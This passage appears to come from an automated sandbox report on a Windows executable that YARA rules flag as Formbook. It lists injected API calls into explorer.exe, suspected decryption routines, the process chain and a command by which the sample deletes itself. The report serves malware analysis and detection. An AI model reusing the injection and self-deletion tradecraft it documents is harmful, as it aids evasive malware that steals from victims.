Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9FE0 NtCreateMutant,LdrInitializeThunk,	7_2_055C9FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9780 NtMapViewOfSection,LdrInitializeThunk,	7_2_055C9780
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9650 NtQueryValueKey,LdrInitializeThunk,	7_2_055C9650
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_055C9660
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C96D0 NtCreateKey,LdrInitializeThunk,	7_2_055C96D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_055C96E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_055C9910
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C99A0 NtCreateSection,LdrInitializeThunk,	7_2_055C99A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9840 NtDelayExecution,LdrInitializeThunk,	7_2_055C9840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_055C9860
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9A50 NtCreateFile,LdrInitializeThunk,	7_2_055C9A50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9560 NtWriteFile,	7_2_055C9560
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055CAD30 NtSetContextThread,	7_2_055CAD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9520 NtWaitForSingleObject,	7_2_055C9520
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C95F0 NtQueryInformationFile,	7_2_055C95F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055CA770 NtOpenThread,	7_2_055CA770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9770 NtSetInformationFile,	7_2_055C9770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9760 NtOpenProcess,	7_2_055C9760
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055CA710 NtOpenProcessToken,	7_2_055CA710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9730 NtQueryVirtualMemory,	7_2_055C9730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C97A0 NtUnmapViewOfSection,	7_2_055C97A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9670 NtQueryInformationProcess,	7_2_055C9670
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9610 NtEnumerateValueKey,	7_2_055C9610
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9950 NtQueueApcThread,	7_2_055C9950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C99D0 NtCreateProcessEx,	7_2_055C99D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055CB040 NtSuspendThread,	7_2_055CB040
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9820 NtEnumerateKey,	7_2_055C9820
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C98F0 NtReadVirtualMemory,	7_2_055C98F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C98A0 NtWriteVirtualMemory,	7_2_055C98A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9B00 NtSetValueKey,	7_2_055C9B00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055CA3B0 NtGetContextThread,	7_2_055CA3B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9A10 NtQuerySection,	7_2_055C9A10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9A00 NtProtectVirtualMemory,	7_2_055C9A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9A20 NtResumeThread,	7_2_055C9A20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055C9A80 NtOpenDirectoryObject,	7_2_055C9A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B9D60 NtCreateFile,	7_2_010B9D60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B9F40 NtAllocateVirtualMemory,	7_2_010B9F40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B9E10 NtReadFile,	7_2_010B9E10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B9E90 NtClose,	7_2_010B9E90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B9D5A NtCreateFile,	7_2_010B9D5A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B9F3A NtAllocateVirtualMemory,	7_2_010B9F3A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B9E8A NtClose,	7_2_010B9E8A

Detected potential crypto function

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057E97E8	0_2_057E97E8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057E4E08	0_2_057E4E08
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057E94E8	0_2_057E94E8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057E4777	0_2_057E4777
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057ED7F8	0_2_057ED7F8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057ED7E7	0_2_057ED7E7
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057E97D8	0_2_057E97D8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057E0007	0_2_057E0007
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057EF2A1	0_2_057EF2A1
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057EAD48	0_2_057EAD48
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057EAD3F	0_2_057EAD3F
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057E4DF9	0_2_057E4DF9
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057EAFF8	0_2_057EAFF8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041D9F8	1_2_0041D9F8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041E265	1_2_0041E265
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041DABE	1_2_0041DABE
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041D3B5	1_2_0041D3B5
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041DC0A	1_2_0041DC0A
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041D424	1_2_0041D424
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041DD64	1_2_0041DD64
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041E5DF	1_2_0041E5DF
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041E5E2	1_2_0041E5E2
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041D5FF	1_2_0041D5FF
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00402D87	1_2_00402D87
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00409E3B	1_2_00409E3B
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041D720	1_2_0041D720
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041D7D4	1_2_0041D7D4
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041DFFC	1_2_0041DFFC
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041CFA6	1_2_0041CFA6
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Windows\explorer.exe	Code function: 2_2_074BBA32	2_2_074BBA32
Source: C:\Windows\explorer.exe	Code function: 2_2_074BEB0E	2_2_074BEB0E
Source: C:\Windows\explorer.exe	Code function: 2_2_074B6B1F	2_2_074B6B1F
Source: C:\Windows\explorer.exe	Code function: 2_2_074B6B22	2_2_074B6B22
Source: C:\Windows\explorer.exe	Code function: 2_2_074B9132	2_2_074B9132
Source: C:\Windows\explorer.exe	Code function: 2_2_074B2069	2_2_074B2069
Source: C:\Windows\explorer.exe	Code function: 2_2_074BEA6F	2_2_074BEA6F
Source: C:\Windows\explorer.exe	Code function: 2_2_074BA862	2_2_074BA862
Source: C:\Windows\explorer.exe	Code function: 2_2_074B2072	2_2_074B2072
Source: C:\Windows\explorer.exe	Code function: 2_2_074B3CEC	2_2_074B3CEC
Source: C:\Windows\explorer.exe	Code function: 2_2_074B3CF2	2_2_074B3CF2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05651D55	7_2_05651D55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05652D07	7_2_05652D07
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05580D20	7_2_05580D20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_056525DD	7_2_056525DD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0559D5E0	7_2_0559D5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055B2581	7_2_055B2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05642D82	7_2_05642D82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0564D466	7_2_0564D466
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055AB477	7_2_055AB477
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0559841F	7_2_0559841F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05644496	7_2_05644496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05651FF1	7_2_05651FF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0565DFCE	7_2_0565DFCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055A6E30	7_2_055A6E30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0564D616	7_2_0564D616
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05652EF7	7_2_05652EF7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0558F900	7_2_0558F900
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055A4120	7_2_055A4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055A99BF	7_2_055A99BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0565E824	7_2_0565E824
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05641002	7_2_05641002
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055AA830	7_2_055AA830
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_056528EC	7_2_056528EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0559B090	7_2_0559B090
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_056520A8	7_2_056520A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055B20A0	7_2_055B20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055AAB40	7_2_055AAB40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0562CB4F	7_2_0562CB4F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05652B28	7_2_05652B28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055AA309	7_2_055AA309
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_056323E3	7_2_056323E3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055BABD8	7_2_055BABD8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0564DBD2	7_2_0564DBD2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_056403DA	7_2_056403DA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055B138B	7_2_055B138B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055BEBB0	7_2_055BEBB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0563FA2B	7_2_0563FA2B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055AB236	7_2_055AB236
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_05644AEF	7_2_05644AEF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_056522AE	7_2_056522AE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BD9F8	7_2_010BD9F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BE265	7_2_010BE265
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BDABE	7_2_010BDABE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BDD64	7_2_010BDD64
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010A2D87	7_2_010A2D87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010A2D90	7_2_010A2D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BE5DF	7_2_010BE5DF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BE5E2	7_2_010BE5E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BDC0A	7_2_010BDC0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BD420	7_2_010BD420
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BCFA6	7_2_010BCFA6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BD7BE	7_2_010BD7BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010A2FB0	7_2_010A2FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BDFFC	7_2_010BDFFC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010A9E3B	7_2_010A9E3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010A9E40	7_2_010A9E40

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\explorer.exe

Code function: String function: 0558B150 appears 136 times

Sample file is different than original file name gathered from version info

Source: zHgm9k7WYU.exe	Binary or memory string: OriginalFilename vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe, 00000000.00000000.228278188.00000000005B2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe, 00000000.00000002.261046059.0000000005170000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe, 00000000.00000002.254306135.00000000029E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameTypeLibImporterFlags.dll4 vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe, 00000000.00000002.261473078.00000000054D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe	Binary or memory string: OriginalFilename vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe, 00000001.00000002.290950231.0000000000ED2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe, 00000001.00000002.297873498.000000000396E000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs zHgm9k7WYU.exe
Source: zHgm9k7WYU.exe	Binary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe

Uses 32bit PE files

Source: zHgm9k7WYU.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: zHgm9k7WYU.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@6/5

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zHgm9k7WYU.exe.log

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zHgm9k7WYU.exe 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
Source: unknown	Process created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'	Jump to behavior

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_005B5DF5 push esp; iretd	0_2_005B5DFB
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_005B39AE push edi; retf	0_2_005B39AF
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057EC208 push eax; iretd	0_2_057EC209
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 0_2_057EA8EF push E802E15Eh; retf	0_2_057EA901
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00405906 push esp; iretd	1_2_0040590B
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00416BA6 pushfd ; iretd	1_2_00416BA7
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00417694 push esi; iretd	1_2_00417699
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041CEB5 push eax; ret	1_2_0041CF08
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041CF6C push eax; ret	1_2_0041CF72
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041CF02 push eax; ret	1_2_0041CF08
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_0041CF0B push eax; ret	1_2_0041CF72
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00ED39AE push edi; retf	1_2_00ED39AF
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Code function: 1_2_00ED5DF5 push esp; iretd	1_2_00ED5DFB
Source: C:\Windows\explorer.exe	Code function: 2_2_074BF3E6 pushad ; ret	2_2_074BF3E7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_055DD0D1 push ecx; ret	7_2_055DD0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010A5906 push esp; iretd	7_2_010A590B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B6BA6 pushfd ; iretd	7_2_010B6BA7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BCF0B push eax; ret	7_2_010BCF72
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BCF02 push eax; ret	7_2_010BCF08
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BCF6C push eax; ret	7_2_010BCF72
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010B7694 push esi; iretd	7_2_010B7699
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_010BCEB5 push eax; ret	7_2_010BCF08

Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
